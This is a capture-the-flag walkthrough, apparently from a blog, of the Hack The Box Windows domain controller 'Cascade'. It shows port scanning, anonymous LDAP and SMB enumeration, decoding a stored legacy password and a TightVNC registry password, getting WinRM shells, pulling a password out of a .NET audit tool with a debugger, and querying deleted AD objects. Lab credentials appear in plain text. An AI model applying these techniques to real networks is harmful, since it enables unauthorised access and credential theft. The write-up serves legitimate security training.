┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.182
All 1000 scanned ports on 10.10.10.182 (10.10.10.182) are in ignored states.
┌──(kali💀kali)-[~]
└─$ sudo nmap -sU -O 10.10.10.182
PORT STATE SERVICE
53/udp open domain
123/udp open ntp
389/udp open ldap
OS CPE: cpe:/h:allen-bradley:micrologix_1100 cpe:/h:atcom:at-320 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2012 cpe:/a:vmware:player
┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -p- 10.10.10.182
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-26 07:47:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-12-26T07:48:31
|_ start_date: 2023-12-26T07:34:24
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
Enumeration: SMB - TCP 445
SMB seems to allow anonymous login, but then shows no shares:
┌──(kali💀kali)-[~]
└─$ smbclient -N -L //10.10.10.182
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.182 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.182
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 970
Enumeration: RPC - 445
RPC does allow for anonymous connection as well. I am able to list domain users:
First, we can try an anonymous bind on the LDAP port using ldapsearch and list usernames. Here, we used the grep command to look for the userPrincipalName attribute that specifies the UPN of the users.
We got some users. Now, for the CTF-y part, we had to take a closer look at ldapsearch command output and found an attribute named cascadeLegacyPwd for the r.thompson@cascade.local user.
┌──(kali💀kali)-[~]
└─$ smbmap -H 10.10.10.182 -u r.thompson -p rY4n5eva
[+] IP: 10.10.10.182:445 Name: cascade.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
Audit$ NO ACCESS
C$ NO ACCESS Default share
Data READ ONLY
IPC$ NO ACCESS Remote IPC
NETLOGON READ ONLY Logon server share
print$ READ ONLY Printer Drivers
SYSVOL READ ONLY Logon server share
By taking a look at the Data share, we found multiple folders. In a real-world scenario, adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives. With the previously discovered shares, let’s see if we can find interesting files.
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt off
smb: \> mget *
NT_STATUS_ACCESS_DENIED listing \Contractors\*
NT_STATUS_ACCESS_DENIED listing \Finance\*
NT_STATUS_ACCESS_DENIED listing \Production\*
NT_STATUS_ACCESS_DENIED listing \Temps\*
getting file \IT\Email Archives\Meeting_Notes_June_2018.html of size 2522 as IT/Email Archives/Meeting_Notes_June_2018.html (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)
getting file \IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log of size 1303 as IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log (1.0 KiloBytes/sec) (average 1.5 KiloBytes/sec)
getting file \IT\Logs\DCs\dcdiag.log of size 5967 as IT/Logs/DCs/dcdiag.log (4.7 KiloBytes/sec) (average 2.5 KiloBytes/sec)
getting file \IT\Temp\s.smith\VNC Install.reg of size 2680 as IT/Temp/s.smith/VNC Install.reg (2.1 KiloBytes/sec) (average 2.4 KiloBytes/sec)
Done. Let’s start by taking a look at the Meeting_Notes_June_2018.html file. I’ll keep an eye out for the admin account password and TempAdmin.
VNC Install.reg is interesting too. The file uses 16-bit characters, and therefore looks really ugly in less or vim, but cat handles it: The line "Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f jumped out as interesting.
Crack TightVNC Password:
OPTION1:
Some reading about TightVNC shows that it stores the password in the register encrypted with a static key. There’s a bunch of tools out there to do it. I used this. That command is using the -r -p options in xxd to convert from a hex string to ran binary.
This is interesting, it’s a backup of registry keys related to VNC. We can also see an encoded password. VNC uses a hardcoded DES key to store credentials. The same key is used across multiple product lines so we may get a cleartext password by decrypting it.
Using this post about VNC passwords, we can try to decrypt it. According to the article, decryption the password is as simple as that:
*Evil-WinRM* PS C:\Users\s.smith\Desktop> type user.txt39a92c------------------------------
Privesc: s.smith –> arksvc
Enumeration:
*Evil-WinRM* PS C:\Users\s.smith\Desktop> net user s.smithUser name s.smithFull Name Steve SmithCommentUser's commentCountry code 000 (System Default)Account active YesAccount expires NeverPassword last set 1/28/2020 7:58:05 PMPassword expires NeverPassword changeable 1/28/2020 7:58:05 PMPassword required YesUser may change password NoWorkstations allowed AllLogon script MapAuditDrive.vbsUser profileHome directoryLast logon 1/28/2020 11:26:39 PMLogon hours allowed AllLocal Group Memberships *Audit Share *IT *Remote Management UseGlobal Group memberships *Domain UsersThe command completed successfully.
*Evil-WinRM* PS C:\Users\s.smith\Desktop> whoami /privPRIVILEGES INFORMATION----------------------Privilege Name Description State==================================================================SeMachineAccountPrivilege Add workstations to domain EnabledSeChangeNotifyPrivilege Bypass traverse checking EnabledSeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\s.smith\Desktop> systeminfoProgram 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1
*Evil-WinRM* PS C:\Users\s.smith\Desktop> net localgroup "Audit Share"Alias name Audit ShareComment \\Casc-DC1\Audit$Members-------------------------------------------------------------------------------s.smithThe command completed successfully.
s.smith is the only user in the group, but the comment is a useful hint to look at this share. There’s a c:\shares, but I don’t have permissions to list the directories in it:
*Evil-WinRM* PS C:\Shares> dirAccess to the path 'C:\Shares' is denied.
However, I can just go into Audit based on the share name in the comment:
*Evil-WinRM* PS C:\Shares> cd Audit*Evil-WinRM* PS C:\Shares\Audit> dir Directory: C:\Shares\AuditMode LastWriteTime Length Name---------------------------d-----1/28/20209:40 PM DBd-----1/26/202010:25 PM x64d-----1/26/202010:25 PM x86-a----1/28/20209:46 PM 13312CascAudit.exe-a----1/29/20206:00 PM 12288 CascCrypto.dll-a----1/28/202011:29 PM 45RunAudit.bat-a----10/27/20196:38 AM 363520 System.Data.SQLite.dll-a----10/27/20196:38 AM 186880 System.Data.SQLite.EF6.dll
Nothing jumped out as particularly interesting. I thought the Ldap table could have had a password in it, but the base64-encoded data didn’t decode to ASCII. Perhaps it’s encrypted somehow.
CascAudit.exe:
RunAudit.bat shows that CascAudit.exe is run with the db file as an argument:
┌──(kali💀kali)-[~/Desktop]
└─$ file CascAudit.exe
CascAudit.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
I’ll jump over to a Windows VM and use DNSpy to take a look. In the MailModule, there’s this code:
It is opening an SQLite connection to the database passed as an arg, reading from the LDAP table, and decrypting the password.
I decided to recover the plaintext password by debugging. I put a breakpoint on line 53 where the SQL connection is closed. Then I went Debug -> Start Debugging…, and set the Arugument to where I had a copy of Audit.db:
On hitting OK, it runs to the breakpoint, and I can see the decrypted password in the Locals window:
Based on the line in the SQLite DB, this password, w3lc0meFr31nd, likely pairs with the account arksvc.
WinRM:
crackmapexec shows that not only does the password work, but will provide a WinRM shell:
*Evil-WinRM* PS C:\Users\arksvc\Documents> net user arksvcUser name arksvcFull Name ArkSvcCommentUser's commentCountry code 000 (System Default)Account active YesAccount expires NeverPassword last set 1/9/2020 4:18:20 PMPassword expires NeverPassword changeable 1/9/2020 4:18:20 PMPassword required YesUser may change password NoWorkstations allowed AllLogon scriptUser profileHome directoryLast logon 1/29/2020 9:05:40 PMLogon hours allowed AllLocal Group Memberships *AD Recycle Bin *IT *Remote Management UseGlobal Group memberships *Domain UsersThe command completed successfully.
AD Recycle:
AD Recycle Bin is a well-know Windows group. Active Directory Object Recovery (or Recycle Bin) is a feature added in Server 2008 to allow administrators to recover deleted items just like the recycle bin does for files. The linked article gives a PowerShell command to query all of the deleted objects within a domain:
The last one is really interesting, because it’s the temporary administer account mentioned in the old email I found earlier (which also said it was using the same password as the normal admin account). I can get all the details for that account:
